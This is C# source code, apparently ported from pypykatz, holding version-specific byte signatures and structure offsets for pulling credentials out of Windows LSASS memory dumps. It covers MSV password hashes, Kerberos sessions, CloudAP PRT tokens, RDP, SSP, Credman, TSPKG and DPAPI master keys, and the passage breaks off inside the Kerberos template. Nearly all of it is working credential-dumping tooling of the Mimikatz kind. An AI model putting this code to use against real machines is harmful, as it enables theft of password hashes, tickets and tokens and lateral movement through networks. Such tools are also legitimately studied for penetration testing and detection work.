public static CloudapTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
CloudapTemplate template = new CloudapTemplate();
if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsBuild.WIN_10_1903)
{
return(template);
}
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
template.signature = new byte[] { 0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75 };
template.first_entry_offset = -9;
template.list_entry = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
template.signature = new byte[] { 0x8b, 0x31, 0x39, 0x72, 0x10, 0x75 };
template.first_entry_offset = -8;
template.list_entry = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
}
else
{
throw new Exception(String.Format("Could not identify template! Architecture: %s sysinfo.BuildNumber: %s", sysinfo.ProcessorArchitecture, sysinfo.BuildNumber));
}
template.luidOffset = StructFieldOffset(template.list_entry, "LocallyUniqueIdentifier");
template.cacheOffset = StructFieldOffset(template.list_entry, "cacheEntry");
template.cbPRTOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "cbPRT");
template.PRTOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "PRT");
template.tonameOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "toname");
return(template);
}
public static RdpTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
RdpTemplate template = new RdpTemplate();
if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_8)
{
List <byte[]> signatures = new List <byte[]>
{
new byte[] { 0x00, 0x00, 0x00, 0x00, 0xbb, 0x47 },
new byte[] { 0x00, 0x00, 0x00, 0x00, 0xf3, 0x47 },
new byte[] { 0x00, 0x00, 0x00, 0x00, 0x3b, 0x01 },
};
template.signature = signatures;
template.first_entry_offset = 0;
template.cred_struct = new WTS_KIWI();
}
else
{
List <byte[]> signatures = new List <byte[]>()
{
new byte[] { 0xc8, 0x00, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00 }
};
template.signature = signatures;
template.first_entry_offset = 16;
template.cred_struct = new WTS_KIWI_2008R2();
}
return(template);
}
//https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L162
public static ulong get_ptr(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
fileBinaryReader.BaseStream.Seek(pos, 0);
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
UInt32 ptr = Minidump.Helpers.ReadUInt32(fileBinaryReader);
return((ulong)ptr);
}
else
{
UInt16 ptr = Minidump.Helpers.ReadUInt16(fileBinaryReader);
return((ulong)ptr);
}
}
public static object get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
throw new Exception($"X86 not yet supported");
}
else
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
//return lsaTemplate_NT5.get_template(sysinfo);
throw new Exception($"NT5 not yet supported");
}
else
{
return(lsaTemplate_NT6.get_template(sysinfo));
}
}
}
public static SspTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
var template = new SspTemplate();
template.list_entry = new KIWI_SSP_CREDENTIAL_LIST_ENTRY();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
template.first_entry_offset = 16;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[]
{ 0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15 };
template.first_entry_offset = 20;
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
template.first_entry_offset = 14;
}
else
{
//currently doesnt make sense, but keeping it here for future use
throw new Exception($"Unknown buildnumber! {sysinfo.BuildNumber}");
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
template.signature = new byte[] { 0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
template.first_entry_offset = 12;
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static LiveSspTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
var template = new LiveSspTemplate();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
template.signature = new byte[] { 0x74, 0x25, 0x8b };
template.first_entry_offset = -7;
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
template.signature = new byte[] { 0x8b, 0x16, 0x39, 0x51, 0x24, 0x75, 0x08 };
template.first_entry_offset = -8;
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static CredmanTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
CredmanTemplate template = new CredmanTemplate();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_5);
template.offset = 0;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_60);
template.offset = 0;
}
else
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY);
template.offset = 0;
}
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_5_X86);
template.offset = -32;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_60_X86);
template.offset = -32;
}
else
{
template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_X86);
template.offset = -32;
}
return(template);
}
public static MsvTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
var template = new MsvTemplate();
template.MSV1CredentialsOffset = FieldOffset <KIWI_MSV1_0_PRIMARY_CREDENTIALS>("Credentials");
template.MSV1PrimaryOffset = FieldOffset <KIWI_MSV1_0_PRIMARY_CREDENTIALS>("Primary");
template.PasswordOffset = 0;
//identify credential session list structure to be used
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_51);
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_52);
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_60);
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
//do not do that :) //skelsec
if (sysinfo.msv_dll_timestamp > 0x53480000)
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ);
}
else
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_61);
}
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
//template.list_entry = PKIWI_MSV1_0_LIST_62
Console.WriteLine(sysinfo.msv_dll_timestamp);
if (sysinfo.msv_dll_timestamp > 0x53480000)
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_63);
}
else
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_62);
}
}
else
{
template.list_entry = typeof(KIWI_MSV1_0_LIST_63);
}
template.ListTypeSize = Marshal.SizeOf(template.list_entry);
template.LocallyUniqueIdentifierOffset = StructFieldOffset(template.list_entry, "LocallyUniqueIdentifier");
template.LogonTypeOffset = StructFieldOffset(template.list_entry, "LogonType");
template.SessionOffset = StructFieldOffset(template.list_entry, "Session");
template.UserNameListOffset = StructFieldOffset(template.list_entry, "UserName");
template.DomainOffset = StructFieldOffset(template.list_entry, "Domain");
template.CredentialsOffset = StructFieldOffset(template.list_entry, "Credentials");
template.pSidOffset = StructFieldOffset(template.list_entry, "pSid");
template.CredentialManagerOffset = StructFieldOffset(template.list_entry, "CredentialManager");
template.LogonTimeOffset = StructFieldOffset(template.list_entry, "LogonTime");
template.LogonServerOffset = StructFieldOffset(template.list_entry, "LogonServer");
//
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL);
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1511)
{
template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10_OLD);
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10);
}
else
{
template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10_1607);
template.PasswordOffset = -2;
}
template.LogonDomainNameOffset = StructFieldOffset(template.credential_entry, "LogonDomainName");
template.UserNameOffset = StructFieldOffset(template.credential_entry, "UserName");
template.LmOwfPasswordOffset = StructFieldOffset(template.credential_entry, "LmOwfPassword") + template.PasswordOffset;
template.NtOwfPasswordOffset = StructFieldOffset(template.credential_entry, "NtOwfPassword") + template.PasswordOffset;
template.ShaOwPasswordOffset = StructFieldOffset(template.credential_entry, "ShaOwPassword") + template.PasswordOffset;
if (template.credential_entry != typeof(MSV1_0_PRIMARY_CREDENTIAL_10_1607))
{
template.DPAPIProtectedOffset = 0;
}
else
{
template.DPAPIProtectedOffset = FieldOffset <MSV1_0_PRIMARY_CREDENTIAL_10_1607>("DPAPIProtected");
}
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8 };
template.first_entry_offset = -4;
template.LogonSessionListCountOffset = 0;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8 };
template.first_entry_offset = -4;
template.LogonSessionListCountOffset = -45;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.signature = new byte[] { 0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84 };
template.first_entry_offset = 21;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84 };
template.first_entry_offset = 19;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
template.first_entry_offset = 16;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05 };
template.first_entry_offset = 36;
template.LogonSessionListCountOffset = -6;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1703)
{
//1503 and 1603
template.signature = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
template.first_entry_offset = 16;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1703 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1803)
{
//1703
template.signature = new byte[] { 0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };
template.first_entry_offset = 23;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1803 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1903)
{
//1803
template.signature = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };
template.first_entry_offset = 23;
template.LogonSessionListCountOffset = -4;
}
else
{
//1903
template.signature = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
template.first_entry_offset = 23;
template.LogonSessionListCountOffset = -4;
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84 };
template.first_entry_offset = 24;
template.LogonSessionListCountOffset = 0;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd };
template.first_entry_offset = -11;
template.LogonSessionListCountOffset = -43;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd };
template.first_entry_offset = -11;
template.LogonSessionListCountOffset = -42;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x8b, 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0xde, 0x89, 0x02, 0x89, 0x5d, 0xf0, 0x85, 0xc9, 0x74 };
template.first_entry_offset = 18;
template.LogonSessionListCountOffset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x8b, 0x4d, 0xe4, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xe8, 0x89, 0x01, 0x85, 0xff, 0x74 };
template.first_entry_offset = 16;
template.LogonSessionListCountOffset = -4;
}
else if ((int)sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x8b, 0x4d, 0xe8, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xec, 0x89, 0x01, 0x85, 0xff, 0x74 };
template.first_entry_offset = 16;
template.LogonSessionListCountOffset = -4;
}
else
{
throw new Exception($"Could not identify template! {sysinfo.BuildNumber}");
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
//https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L168
public static ulong get_ptr_with_offset(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);
UInt32 ptr = Minidump.Helpers.ReadUInt32(fileBinaryReader);
return((ulong)(pos + 4 + ptr));
}
else
{
fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);
UInt16 ptr = Minidump.Helpers.ReadUInt16(fileBinaryReader);
return(ptr);
}
}
public static TspkgTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
TspkgTemplate template = new TspkgTemplate();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
template.signature = new byte[] { 0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d };
template.avl_offset = 7;
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL>("pTsPrimary");
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL_1607());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("pTsPrimary");
}
else
{
//currently doesnt make sense, but keeping it here for future use
throw new Exception($"Unknown buildnumber! {sysinfo.BuildNumber}");
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe };
template.avl_offset = 8;
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL_1607());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("pTsPrimary");
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x8b, 0xff, 0x53, 0xbb };
template.avl_offset = 4;
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL>("pTsPrimary");
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.signature = new byte[] { 0x8b, 0xff, 0x57, 0xbf };
template.avl_offset = 4;
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL_1607());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("pTsPrimary");
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.signature = new byte[] { 0x8b, 0xff, 0x57, 0xbf };
template.avl_offset = 4;
template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL_1607());
template.TSCredLocallyUniqueIdentifierOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("LocallyUniqueIdentifier");
template.TSCredOffset = FieldOffset <KIWI_TS_CREDENTIAL_1607>("pTsPrimary");
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static DpapiTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
DpapiTemplate template = new DpapiTemplate();
template.list_entry = new KIWI_MASTERKEY_CACHE_ENTRY();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x4d, 0x3b, 0xee, 0x49, 0x8b, 0xfd, 0x0f, 0x85 };
template.first_entry_offset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.signature = new byte[] { 0x49, 0x3b, 0xef, 0x48, 0x8b, 0xfd, 0x0f, 0x84 };
template.first_entry_offset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x33, 0xc0, 0xeb, 0x20, 0x48, 0x8d, 0x05 };
template.first_entry_offset = 7;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[]
{ 0x4c, 0x89, 0x1f, 0x48, 0x89, 0x47, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85 };
template.first_entry_offset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x08, 0x48, 0x39, 0x48, 0x08, 0x0f, 0x85 };
template.first_entry_offset = -10;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.signature = new byte[] { 0x48, 0x89, 0x4e, 0x08, 0x48, 0x39, 0x48, 0x08 };
template.first_entry_offset = -7;
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.signature = new byte[] { 0x48, 0x89, 0x4f, 0x08, 0x48, 0x89, 0x78, 0x08 };
template.first_entry_offset = 11;
}
else
{
//currently doesnt make sense, but keeping it here for future use
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x33, 0xc0, 0x40, 0xa3 };
template.first_entry_offset = -4;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x8b, 0xf0, 0x81, 0xfe, 0xcc, 0x06, 0x00, 0x00, 0x0f, 0x84 };
template.first_entry_offset = -16;
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x33, 0xc0, 0x40, 0xa3 };
template.first_entry_offset = -4;
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static KerberosTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
KerberosTemplate template = new KerberosTemplate();
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0x48, 0x3b, 0xfe, 0x0f, 0x84 };
template.first_entry_offset = -4;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x48, 0x3b, 0xfe, 0x0f, 0x84 };
template.first_entry_offset = -4;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1511)
{
template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1511 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
{
